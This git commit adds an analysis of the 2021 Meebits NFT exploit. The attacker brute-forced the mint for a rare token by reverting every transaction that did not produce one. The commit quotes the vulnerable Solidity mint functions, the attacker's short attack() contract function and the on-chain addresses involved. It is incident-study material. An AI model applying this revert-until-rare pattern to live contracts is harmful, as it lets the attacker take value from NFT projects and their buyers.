add Meebits exploit

Author: MikeSpa

.gitignore

@@ -0,0 +1 @@
+.env

Meebits/Analysis.md

@@ -0,0 +1,133 @@
+# Analysis of the Meebits exploit 
+
+In May 2021, an attacker, armed with the list of rare Meebits tokenIds, managed to brute force the early mint of the NFT and revert all transactions except the ones that would mint a rare NFT. He managed to mint one before the mint was paused, and sold it for 200 ETH.
+
+The exploited Meebits contract on etherscan: [0x7bd29408f11d2bfc23c34f18275bbf23bb716bc7](https://etherscan.io/address/0x7bd29408f11d2bfc23c34f18275bbf23bb716bc7#code)  
+The exploit transaction hash: [0xcad228421360736da7c5a07ae0bdfc868c6a66613109f64a24ccffedfdd5f04d](https://etherscan.io/tx/0xcad228421360736da7c5a07ae0bdfc868c6a66613109f64a24ccffedfdd5f04d)  
+The transaction hash with the sale: [0x8edd496c28603b334a57dbf459b3d1fc61a33b08e8aaaaf7f634080482c3f026](https://etherscan.io/tx/0x8edd496c28603b334a57dbf459b3d1fc61a33b08e8aaaaf7f634080482c3f026)  
+
+The hacker address: [0xb08be767cdc33913f8e2fa44193f4e2eb5725876](https://etherscan.io/address/0xb08be767cdc33913f8e2fa44193f4e2eb5725876)  
+The hacker address 2: [0x009988ff77eeaa00051238ee32c48f10a174933e](https://etherscan.io/address/0x009988ff77eeaa00051238ee32c48f10a174933e)  
+The Exploit contract: [0x270ff2308a29099744230de56e7b41c8ced46ffb](https://etherscan.io/address/0x270ff2308a29099744230de56e7b41c8ced46ffb)  
+
+## The vulnerability: leaked rarity traits
+
+Inside a NFT collection, some token are more rare than others, and thus more valuable. The rarity is baseed on the token's traits. Unfortunately, for the Meebits NFT, the contract contained a file with the metadata of the collection, containing the traits and their rarity for each tokenId. So when you minted an NFT, you could know its relative value.
+
+```solidity
+// IPFS Hash to the NFT content
+    string public contentHash =
+        "QmfXYgfX1qNfzQ6NRyFnupniZusasFPMeiWn5aaDnx7YXo";
+```
+
+Since the `mint()` function returns the id of the minted token, a contract could easily call the `mint()` function and `revert` if the returned id was not in a list of rare tokenId.
+```solidity
+
+/**
+ * Public sale minting.
+ */
+function mint() external payable reentrancyGuard returns (uint256) {
+    require(publicSale, "Sale not started.");
+    require(!marketPaused);
+    require(numSales < SALE_LIMIT, "Sale limit reached.");
+    uint256 salePrice = getPrice();
+    require(msg.value >= salePrice, "Insufficient funds to purchase.");
+    if (msg.value > salePrice) {
+        msg.sender.transfer(msg.value.sub(salePrice));
+    }
+    beneficiary.transfer(salePrice);
+    numSales++;
+    return _mint(msg.sender, 0);
+}
+function _mint(address _to, uint256 createdVia) internal returns (uint256) {
+    require(_to != address(0), "Cannot mint to 0x0.");
+    require(numTokens < TOKEN_LIMIT, "Token limit reached.");
+    uint256 id = randomIndex();
+
+    numTokens = numTokens + 1;
+    _addNFToken(_to, id);
+
+    emit Mint(id, _to, createdVia);
+    emit Transfer(address(0), _to, id);
+    return id;
+}
+```
+
+## The exploit
+
+The attacker deployed his attack contract, with a list of rare tokenId, and an `attack()` function which simply called `mintWithPunkOrGlyph()` and made sure the minted token was rare, otherwise the tx would revert. It also sent 1 ETH to the miner to ensure that the transaction would be added to the block:
+
+```solidity
+function attack(uint _punkId) public{
+    uint256 tokenId = meebits.mintWithPunkOrGlyph(_punkId); // mint a meebits
+    require(rareMeebits[tokenId]); //check if its a rare one, revert if not
+    block.coinbase.call{value: 1 ether}(""); // pay the miner
+}
+```
+Before the public mint of the Meebits NFT, they allowed anyone with a CryptoPunks NFT (or an Autoglyph) to mint a Meebits (one per Punks/Glyph NFT). This is why the attacker called `mintWithPunkOrGlyph()` and not `mint()`. In order to be able to call this function, the attacker purchased a cryptoPunk, and sent it to the attack contract.
+The `mintWithPunkOrGlyph()` function:
+```solidity
+/**
+ * Community grant minting.
+ */
+function mintWithPunkOrGlyph(uint256 _createVia)
+    external
+    reentrancyGuard
+    returns (uint256)
+{
+    require(communityGrant);
+    require(!marketPaused);
+    require(
+        _createVia > 0 && _createVia <= 10512,
+        "Invalid punk/glyph index."
+    );
+    require(
+        creatorNftMints[_createVia] == 0,
+        "Already minted with this punk/glyph"
+    );
+    if (_createVia > 10000) {
+        ... // It's a glyph
+    } else {
+        // It's a punk
+        // Compute the punk ID
+        uint256 punkId = _createVia.sub(1);
+        // Make sure the sender owns the punk
+        require(
+            Cryptopunks(punks).punkIndexToAddress(punkId) == msg.sender,
+            "Not the owner of this punk."
+        );
+    }
+    creatorNftMints[_createVia]++;
+    return _mint(msg.sender, _createVia);
+}
+
+function _mint(address _to, uint256 createdVia) internal returns (uint256) {
+    require(_to != address(0), "Cannot mint to 0x0.");
+    require(numTokens < TOKEN_LIMIT, "Token limit reached.");
+    uint256 id = randomIndex();
+
+    numTokens = numTokens + 1;
+    _addNFToken(_to, id);
+
+    emit Mint(id, _to, createdVia);
+    emit Transfer(address(0), _to, id);
+    return id;
+}
+```
+He then start spaming the `attack()` function. This would obvioulsy fail a lot:
+
+![Failed mint transaction](img/fail_brute_force_mint.png "Failed mint transaction")
+
+
+until one succeeded less than an hour later:
+
+![Successful mint transaction](img/successful_brute_force_mint.png "Successful mint transaction")
+
+He then quickly sold Meebits #16647 for 200 ETH and bought another Punk to try again.
+
+
+## The Aftermath
+
+Fortunately, the Meebits team was reactive and quickly stopped the mint, less than 3 hours after the brute forcing started. The attacker only managed to mint one rare token.
+
+